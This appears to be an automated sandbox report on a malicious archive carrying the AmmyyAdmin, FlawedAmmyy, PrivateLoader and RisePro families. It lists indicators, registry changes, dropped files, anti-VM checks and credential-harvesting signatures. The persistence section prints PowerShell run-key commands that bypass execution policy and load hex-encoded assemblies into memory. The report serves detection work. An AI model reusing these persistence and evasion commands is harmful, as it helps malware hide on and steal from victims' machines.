Malware Analysis Report

2024-10-16 05:10

Sample ID 231123-heqf3ahb4w
Target adwares.rar
SHA256 f0a17dac24869601564ba23ed962f33e507d79ca4e6a0a31ff54cdb7644b1cc9
Tags
ammyyadmin flawedammyy privateloader risepro collection discovery evasion loader persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f0a17dac24869601564ba23ed962f33e507d79ca4e6a0a31ff54cdb7644b1cc9

Threat Level: Known bad

The file adwares.rar was found to be: Known bad.

Malicious Activity Summary

ammyyadmin flawedammyy privateloader risepro collection discovery evasion loader persistence rat spyware stealer trojan

Ammyyadmin family

AmmyyAdmin payload

RisePro

FlawedAmmyy RAT

Ammyy Admin

PrivateLoader

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Blocklisted process makes network request

Modifies Installed Components in the registry

Downloads MZ/PE file

Manipulates Digital Signatures

Stops running service(s)

Unexpected DNS network traffic destination

Checks computer location settings

Registers COM server for autorun

Reads user/profile data of web browsers

Checks BIOS information in registry

Loads dropped DLL

Reads user/profile data of local email clients

Executes dropped EXE

Drops startup file

Accesses cryptocurrency files/wallets, possible credential harvesting

Enumerates connected drives

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Accesses Microsoft Outlook profiles

Checks whether UAC is enabled

Checks installed software on the system

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Program Files directory

Drops file in Windows directory

Program crash

Unsigned PE

Enumerates physical storage devices

Modifies data under HKEY_USERS

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies system certificate store

Uses Volume Shadow Copy service COM API

Uses Task Scheduler COM API

Creates scheduled task(s)

Checks SCSI registry key(s)

Enumerates system info in registry

Modifies registry class

outlook_office_path

outlook_win_path

Suspicious use of WriteProcessMemory

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

Checks processor information in registry

Modifies Internet Explorer settings

NTFS ADS

Suspicious behavior: LoadsDriver

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-23 06:39

Signatures

AmmyyAdmin payload

Description Indicator Process Target
N/A N/A N/A N/A

Ammyyadmin family

ammyyadmin

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-23 06:39

Reported

2023-11-23 07:22

Platform

win10v2004-20231025-en

Max time kernel

2553s

Max time network

2559s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\adwares.rar

Signatures

Ammyy Admin

rat ammyyadmin

AmmyyAdmin payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

FlawedAmmyy RAT

trojan flawedammyy

PrivateLoader

loader privateloader

RisePro

stealer risepro

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Downloads\2023-11-23-05\455e6b281f45566309822e9215e699b10ea595e0e45e5ef3dcdd371290c23038.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Downloads\2023-11-23-05\e9f765ba3c25951e6d6ad8d13133c569862ae77ccaf65de7683c3d40c903cf90.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\IEUpdater2\IEUpdater2.exe N/A

Downloads MZ/PE file

Manipulates Digital Signatures

Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4D56E7AC803733AEB63F6B8217F4BE35DFE6C42E\Blob = [blob elided] C:\Windows\system32\rundll32.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates\E74B8BC01BC843C34D710E29DE0411564BADC2F2\Blob = [blob elided] C:\Windows\system32\rundll32.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\E74B8BC01BC843C34D710E29DE0411564BADC2F2\Blob = 030000000100000014000000e74b8bc01bc843c34d710e29de0411564badc2f22000000001000000900500003082058c30820474a00302010202100d7b87bf9200d82906f619b5ee6c603f300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3137303731343030303030305a170d3138303731383132303030305a3081ab31133011060b2b0601040182373c02010313025647311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e3110300e0603550405130731383137383033310b30090603550406130256473112301006035504071309526f616420546f776e3120301e060355040a131749726f6e20456e7465727461696e6d656e7420496e632e3120301e0603550403131749726f6e20456e7465727461696e6d656e7420496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100adccd719ce3b4f84d425e2b3dbbf3273f8367a02e55980fb8b12d0ec202c5bbc0d40ed46059f647e65139a82317acf7f6c441043d6143f8e23097502d3c6ea25255b91fd27949261f4eac63539b1435624791be516dbf3e5d5803fd396a07c238e7c3a7e7be480b8f1e36a08d4fb7ff1ef640c7a6f00904dd3fb5f96ef5f4e7e47baeeed47bdf254fee13bf4a4e72ce5eb7451ae0cf675ad9d19dfed29621f3cc64b3bcdd7dca22b601c39ea6039603128748b1ab4acd40d3d4f53a41a862687424a55e2a56ede2909a81b695cdc2f6e16dc54864eab896765a75d10c0d156156029c91ac22daa455c8d1b853d4a330fce0de6c83b9ad632646509889134d6930203010001a38201e8308201e4301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149709754f51dc8fa3bf2e4540e443dc015d8816ca30250603551d11041e301ca01a06082b06010505070803a00e300c0c0a56472d31383137383033300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101002f9a80a913a1d71b909c639c165ca1603d5ce7fdac7b50a4eb5d18d334d2f9d35cda3aea2e9239994a6910e122d312ad9211aebc525b54d6b480bdc1c969ff237aae64718cc06ddc194bfd735794d9d889019c1903ef81fbb1eb993aae57ef2dd9665b8a4e8265e15da21281a6526dee2c183e84c696f40a9072df9bfe5c878f3fbbc6826c780a136b05d4f97aa21c671e0a0b58f36be031a532979fbb57879b7772c50cb394ce0ea1e6688936168621ce55f9c83a7589a501d67cdd75616748aa6524f0c0867971b56b73f1e5beb3f6e4341dc6d7f4acac6f0438317b0e6d3c35116f7d9c3a2d401ff79579d791621a3500525bf068199d2ecb0c77040a9d28 C:\Windows\system32\rundll32.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4D56E7AC803733AEB63F6B8217F4BE35DFE6C42E\Blob = [blob elided] C:\Windows\system32\rundll32.exe N/A

Modifies Installed Components in the registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\Version = "11,1081,19041,0" C:\Windows\servicing\TrustedInstaller.exe N/A
Key created \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383} C:\Windows\system32\ie4uinit.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\Locale = "*" C:\Windows\system32\ie4uinit.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\Locale = "*" C:\Windows\servicing\TrustedInstaller.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\IsInstalled = "1" C:\Windows\servicing\TrustedInstaller.exe N/A
Key created \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383} C:\Windows\servicing\TrustedInstaller.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383} C:\Windows\system32\ie4uinit.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\IsInstalled = "1" C:\Windows\system32\ie4uinit.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\Version = "11,1081,19041,0" C:\Windows\system32\ie4uinit.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383} C:\Windows\servicing\TrustedInstaller.exe N/A

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Downloads\2023-11-23-05\455e6b281f45566309822e9215e699b10ea595e0e45e5ef3dcdd371290c23038.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Downloads\2023-11-23-05\455e6b281f45566309822e9215e699b10ea595e0e45e5ef3dcdd371290c23038.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Downloads\2023-11-23-05\e9f765ba3c25951e6d6ad8d13133c569862ae77ccaf65de7683c3d40c903cf90.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Downloads\2023-11-23-05\e9f765ba3c25951e6d6ad8d13133c569862ae77ccaf65de7683c3d40c903cf90.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\IEUpdater2\IEUpdater2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\IEUpdater2\IEUpdater2.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\MSI38F5.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Installer Assistant\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\2023-11-23-05\e9f765ba3c25951e6d6ad8d13133c569862ae77ccaf65de7683c3d40c903cf90.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\2023-11-23-04\7d7b62e77cbef24e0b75ea88d79b68a84e2fccdd74dac22de7c18476ce8313ce.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OperaConnect2.lnk C:\Users\Admin\Downloads\2023-11-23-05\e9f765ba3c25951e6d6ad8d13133c569862ae77ccaf65de7683c3d40c903cf90.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe N/A
N/A N/A C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe N/A
N/A N/A C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe N/A
N/A N/A C:\Users\Admin\Desktop\adwares\e34c196497e534f46dd5f2749af66e2d46e46fd8d78b71badfbe2363d27e8030.exe N/A
N/A N/A C:\Users\Admin\Desktop\adwares\b1a7ec17bf00d0d8d15adeb1f9d9de29404841b9f6c1df3f356f5255baf18ffb.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\BBWC\7za.exe N/A
N/A N/A C:\Windows\sysWOW64\wbem\wmiprvse.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Browser Extension\7za.exe N/A
N/A N/A C:\Windows\Installer\MSI731B.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MSI38F5.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Installer Assistant\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\utils\sysinfo-app.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\MobiHelper.exe N/A
N/A N/A C:\Program Files\MobiGame\utils\subinacl.exe N/A
N/A N/A C:\Program Files\MobiGame\MobiGameUpdater.exe N/A
N/A N/A C:\Program Files\MobiGame\aeg_launcher.exe N/A
N/A N/A C:\Program Files\MobiGame\utils\subinacl.exe N/A
N/A N/A C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
N/A N/A C:\Program Files\MobiGame\player\SUPInstall.exe N/A
N/A N/A C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
N/A N/A C:\Program Files\MobiGame\player\NetLwfUninstall.exe N/A
N/A N/A C:\Program Files\MobiGame\player\USBUninstall.exe N/A
N/A N/A C:\Program Files\MobiGame\player\SUPUninstall.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-05\e9f765ba3c25951e6d6ad8d13133c569862ae77ccaf65de7683c3d40c903cf90.exe N/A
N/A N/A C:\ProgramData\IEUpdater2\IEUpdater2.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-05\455e6b281f45566309822e9215e699b10ea595e0e45e5ef3dcdd371290c23038.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-05\0a999f8f8064171ed32e808754c84570cdd517355a0086a8ec988c2619ea6727.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-04\7d7b62e77cbef24e0b75ea88d79b68a84e2fccdd74dac22de7c18476ce8313ce.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-04\8af2c945b04889ffc1c53ab93223bd6ef3a0d6cae3ddb8afb4ddd36599864dc8.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-04\9062ef0482856caa22fe235648bdd7eb8233d6b3d7482dfe7bf32c8473eaf6a3.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-04\e804947286d19d565add00988db1b2380207b4b1d8781ced6cc2956b65fcbe13.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\System32\MsiExec.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\System32\MsiExec.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\System32\MsiExec.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\System32\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\System32\MsiExec.exe N/A
N/A N/A C:\Windows\System32\MsiExec.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Windows\System32\MsiExec.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\System32\MsiExec.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Registers COM server for autorun

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c5e220c6-f6c2-11e7-aeb4-080027376349}\InprocServer32\ThreadingModel = "Free" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c5e23f7a-f6c2-11e7-aeb4-080027376349}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c5e23f7a-f6c2-11e7-aeb4-080027376349}\InprocServer32\ThreadingModel = "Free" C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c5e23f7a-f6c2-11e7-aeb4-080027376349}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c5e23f7a-f6c2-11e7-aeb4-080027376349}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32 C:\Windows\servicing\TrustedInstaller.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c5e220c6-f6c2-11e7-aeb4-080027376349}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c5e23f7a-f6c2-11e7-aeb4-080027376349}\InprocServer32\ = "C:\\Program Files\\MobiGame\\player\\VBoxC.dll" C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c5e220c6-f6c2-11e7-aeb4-080027376349}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c5e220c6-f6c2-11e7-aeb4-080027376349}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32 C:\Windows\system32\ie4uinit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c5e1ec0a-f6c2-11e7-aeb4-080027376349}\LocalServer32 C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c5e1ec0a-f6c2-11e7-aeb4-080027376349}\LocalServer32 C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c5e220c6-f6c2-11e7-aeb4-080027376349}\InprocServer32\ = "C:\\Program Files\\MobiGame\\player\\VBoxC.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c5e1ec0a-f6c2-11e7-aeb4-080027376349}\LocalServer32\ = "\"C:\\Program Files\\MobiGame\\player\\MobiVBoxSVC.exe\"" C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c5e1ec0a-f6c2-11e7-aeb4-080027376349}\LocalServer32 C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 223.5.5.5 N/A N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Downloads\2023-11-23-05\e9f765ba3c25951e6d6ad8d13133c569862ae77ccaf65de7683c3d40c903cf90.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Downloads\2023-11-23-05\e9f765ba3c25951e6d6ad8d13133c569862ae77ccaf65de7683c3d40c903cf90.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Downloads\2023-11-23-05\e9f765ba3c25951e6d6ad8d13133c569862ae77ccaf65de7683c3d40c903cf90.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WCStartup = "powershell -noninteractive -ExecutionPolicy bypass -c \"$w=\"$env:APPDATA\"+'/BBWC/';[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+'Newtonsoft.Json.dll'));[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+'System.Data.SQLite.dll'));[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+'ICSharpCode.SharpZipLib.dll'));[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+'LZ4.dll'));$f=$w+'WC.txt';$h=Get-Content -Path $f -Raw;$h=Get-Content -Path $f -Raw;[byte[]]$bytes=($h -split '(.{2})' -ne '' -replace '^','0X');[Reflection.Assembly]::Load($bytes);[WebCompanion.StartUp]::Start()\"" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WCUpate = "powershell.exe -WindowStyle Hidden -ExecutionPolicy bypass -c \"Start-Sleep 300\";\"& \"\"\"C:\\Users\\Admin\\AppData\\Roaming\\BBWC\\updater.exe\"\"\" /silentall -nofreqcheck\"" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WCEStartup = "powershell.exe -ExecutionPolicy bypass -c \"$f=\"$env:APPDATA\"+'/Browser Extension/BE.txt';$h=Get-Content -Path $f -Raw;[byte[]]$bytes=($h -split '(.{2})' -ne '' -replace '^', '0X');[Reflection.Assembly]::Load($bytes);[WebCompanion.BrowserExtension.S]::Start()\"" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WCEUpdater = "powershell.exe -WindowStyle Hidden -ExecutionPolicy bypass -c \"Start-Sleep 2100\";\"& \"\"\"C:\\Users\\Admin\\AppData\\Roaming\\Browser Extension\\updater.exe\"\"\" /silentall -nofreqcheck\"" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\LegalHelper2 = "C:\\Users\\Admin\\AppData\\Local\\LegalHelper2\\LegalHelper2.exe" C:\Users\Admin\Downloads\2023-11-23-05\e9f765ba3c25951e6d6ad8d13133c569862ae77ccaf65de7683c3d40c903cf90.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Downloads\2023-11-23-05\e9f765ba3c25951e6d6ad8d13133c569862ae77ccaf65de7683c3d40c903cf90.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\ProgramData\IEUpdater2\IEUpdater2.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Downloads\2023-11-23-05\455e6b281f45566309822e9215e699b10ea595e0e45e5ef3dcdd371290c23038.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\N: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\B: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
